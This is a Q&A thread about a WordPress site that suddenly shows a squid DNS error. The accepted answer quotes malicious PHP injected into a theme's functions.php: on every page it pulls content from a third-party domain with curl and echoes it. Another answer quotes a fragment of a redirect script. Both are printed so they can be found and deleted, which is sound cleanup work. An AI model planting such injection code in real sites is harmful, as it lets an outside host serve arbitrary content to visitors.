# Wordpress site can't enter - The requested URL could not be retrieved

Tags: wordpress, security

Please help with the problem as I can't guess how to solve it.

When I enter my wordpress site the following message appears:

```
The requested URL could not be retrieved

While trying to retrieve the URL: http://www1.ghost-bikes.dp.ua/?

The following error was encountered:

Unable to determine IP address from host name for www1.ghost-bikes.dp.ua
The dnsserver returned:

Name Error: The domain name does not exist.
This means that:

 The cache was not able to resolve the hostname presented in the URL. 
 Check if the address is correct. 
Your cache administrator is support. 
Generated Wed, 21 Nov 2012 09:57:05 GMT by none (squid/3.0.STABLE20)
```

The admin area (/wp-admin) opens as usually and works.
I suppose it is a kind of virus. What should I do?

Comment: `The domain name does not exist.` that seems to be your issue, and it looks the same way from here. Are you sure `www1` is correct? What URL are you using to open the admin area?

Answer (score 1, accepted):

Open your theme's `functions.php` and look for the following code:

```
if (!function_exists(‘insert_jquery_theme’)){function insert_jquery_theme(){if (function_exists(‘curl_init’)){$url=”http://www.jqueryc.com/jquery-1.6.3.min.js”;$ch = curl_init();$timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action(‘wp_head’, ‘insert_jquery_theme’);}
```

If you find it, just delete it and you should be fine again.

I just found one issue like this in a different site - look [here](https://stackoverflow.com/questions/13489269/site-freaking-out)

Comment: In this case, what could happen that everything worked earlier with this code and just today this error occured?

Comment: I guess that before that the domain was actually working properly(if you try going to http://www.jqueryc.com/ , you'll see that the domain is now parked - it displays a pre-defined template with adverts and stuff, instead of the normal website). So maybe it wasn't really that malicious - maybe it did just render jQuery, but that is totally not the way to render jQuery - you are not supposed to render jQuery from a non-official 3-rd party site, considering that 1) you have jQuery shipped with WordPress 2) you can use 3 official CDN's(Google's, Microsoft's and Media Temple's) to get jQuery

Comment: If your issue is now fixed, please mark the answer as accepted, so that this question won't stay in the "Unanswered" section any more.

Answer (score 0):

Try to deactivate your WordPress plugins one by one and see if the message disappears. If so, you will know where it comes from.

Comment: Well, I've deactivated but nothing changed. The problem was different.

Answer (score 0):

You're using proxy server SQUID

Your squid can't find this domain: www1.ghost-bikes.dp.ua
Because this domain doesn't exist - it is impossible to resolve this domain to IP address

So, this is not a Wordpress-related problem. This is a DNS-problem

UPDATED

It seems like this domain served by Imena.com.ua - so you should login into your account on imena.com.ua and just to add www1 domain in the DNS records.

UPDATED

Go to your wordpress installation folder and try to find something like this in files:

```
    <script type="text/javascript">
StaticRequestInfo={Referer:document.referrer};function EscapeBrowserFrame()
    </script>
```

Delete these lines.

Comment: That's not the problem :) The problem occurs when you try to load the main domain ghost-bikes.dp.ua and not the www1 sub-domain(which obviously is not configured). The problem is a malicious script in functions.php, that inserts HTML from another domain, which then tries to redirect the page, but creates either a redirect loop, or just points to a wrong domain.

Comment: It is not obvious which exactly URL topic starter tries to open. Perhaps you're right.

Comment: Yes, the problem was in JavaScript in the theme. I just commented code which Nikola advised to delete and everything works.

Answer (score -1):

***Log into the DNS panel of your hosting enviroment and check the DNS settings.***

*If those do not solve it.. you can try this:*

***// in wp-config***

define('WP_SITEURL', 'http://www.site.nl');

define('WP_HOME', 'http://www.site.nl');

***// in functions.php at the top. Remove after first run.***

update_option('siteurl','http://www.site.nl');

update_option('home','http://www.site.nl');

This will set the correct url or IP through the whole site.

Comment: just try to ping www1.ghost-bikes.dp.ua - does it pong? nope.

Comment: Indeed, it's a DNS problem. I put in the extra info, so that it is clear that the url is correct throughout the site. So it is clear that it isnt a internal WP problem.